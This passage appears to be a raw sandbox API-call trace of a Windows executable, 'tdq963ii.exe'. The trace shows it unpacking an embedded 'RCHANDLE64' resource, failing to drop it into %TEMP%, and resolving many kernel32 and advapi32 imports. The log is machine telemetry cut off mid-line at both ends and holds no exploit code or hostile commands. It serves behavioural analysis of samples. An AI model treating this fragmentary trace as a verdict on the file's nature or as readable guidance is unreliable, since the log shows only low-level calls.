!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ{ªSúäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0176.779] GetLastError () returned 0x0 [0176.779] SetLastError (dwErrCode=0x0) [0176.780] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0176.780] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0176.780] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0176.780] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0176.780] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ{ªSúäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0176.781] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x80) returned 0x5c9250 [0176.781] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0176.781] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0176.782] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5c9250) returned 0x80 [0176.782] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0176.782] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0176.782] GetCurrentProcess () returned 0xffffffff [0176.782] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0176.782] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0176.782] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0176.785] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0176.785] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0176.785] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0176.785] LockResource (hResData=0x43c648) returned 0x43c648 [0176.785] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x18) returned 0x5c9720 [0176.786] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.166] GetLastError () returned 0x20 [0178.166] GetLastError () returned 0x20 [0178.166] SetLastError (dwErrCode=0x20) [0178.166] GetLastError () returned 0x20 [0178.166] SetLastError (dwErrCode=0x20) [0178.166] GetLastError () returned 0x20 [0178.166] SetLastError (dwErrCode=0x20) [0178.167] GetLastError () returned 0x20 [0178.167] SetLastError (dwErrCode=0x20) [0178.167] GetLastError () returned 0x20 [0178.168] SetLastError (dwErrCode=0x20) [0178.168] GetLastError () returned 0x20 [0178.168] SetLastError (dwErrCode=0x20) [0178.168] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1000) returned 0x5c9740 [0178.169] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0178.171] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8820 | out: hHeap=0x5b0000) returned 1 [0178.172] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0178.172] ExitProcess (uExitCode=0x1) [0178.173] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c70c8 | out: hHeap=0x5b0000) returned 1 Process: id = "165" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2fbfc000" os_pid = "0xad8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 684 os_tid = 0x78c Thread: id = 691 os_tid = 0x3a4 Thread: id = 695 os_tid = 0x130 Process: id = "166" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x31589000" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "159" os_parent_pid = "0x5e4" cmd_line = "tdq963ii.exe -accepteula \"blank.jtp\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 685 os_tid = 0xae8 [0173.087] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0173.087] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0173.087] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0173.087] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0173.087] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0173.088] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0173.088] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0173.088] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0173.088] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0173.088] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0173.088] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0173.088] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0173.088] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0173.088] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0173.089] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0173.089] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0173.089] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0173.089] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0173.089] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0173.089] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0173.089] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0173.089] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0173.089] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0173.090] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0173.090] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0173.090] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0173.090] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0173.090] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0173.090] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0173.090] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0173.090] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0173.091] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0173.091] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0173.091] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0173.091] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0173.091] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0173.091] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0173.091] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0173.092] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0173.092] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0173.092] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0173.092] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0173.092] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0173.092] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0173.093] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0173.093] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0173.093] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0173.093] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0173.093] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0173.093] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0173.094] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0173.094] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0173.094] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0173.094] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0173.094] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0173.094] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0173.094] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0173.094] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0173.095] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0173.095] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0173.095] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0173.095] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0173.095] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0173.096] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0173.096] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0173.096] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0173.096] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0173.096] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0173.096] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0173.096] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0173.096] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0173.097] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0173.097] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0173.097] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0173.097] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0173.097] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0173.097] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0173.097] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0173.098] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0173.098] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0173.098] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0173.098] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0173.098] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0173.098] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0173.098] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0173.099] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0173.099] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0173.099] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0173.099] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0173.099] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0173.099] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0173.099] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0173.100] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0173.100] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0173.100] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0173.100] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0173.100] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0173.100] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0173.100] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0173.100] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0173.101] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0173.101] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0173.101] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0173.101] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0173.101] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0173.102] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0173.102] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0173.102] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0173.102] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0173.102] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0173.103] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0173.103] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0173.103] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0173.103] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0173.103] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0173.104] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0173.104] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0173.104] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0173.104] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0173.104] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0173.105] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0173.105] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0173.105] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0173.105] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0173.105] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0173.105] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0173.105] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0173.547] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0173.568] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x210b1aa0, dwHighDateTime=0x1d68287)) [0173.568] GetCurrentThreadId () returned 0xae8 [0173.569] GetCurrentProcessId () returned 0xa84 [0173.569] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=29390756575) returned 1 [0173.574] GetProcessHeap () returned 0x640000 [0174.915] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0174.915] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0174.916] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0174.916] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0174.916] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0174.916] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0174.916] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0174.916] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0174.916] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0174.917] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0174.917] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0174.917] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0174.917] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0174.917] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0174.917] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0174.917] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0174.917] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0174.918] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0174.918] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0174.918] GetProcAddress 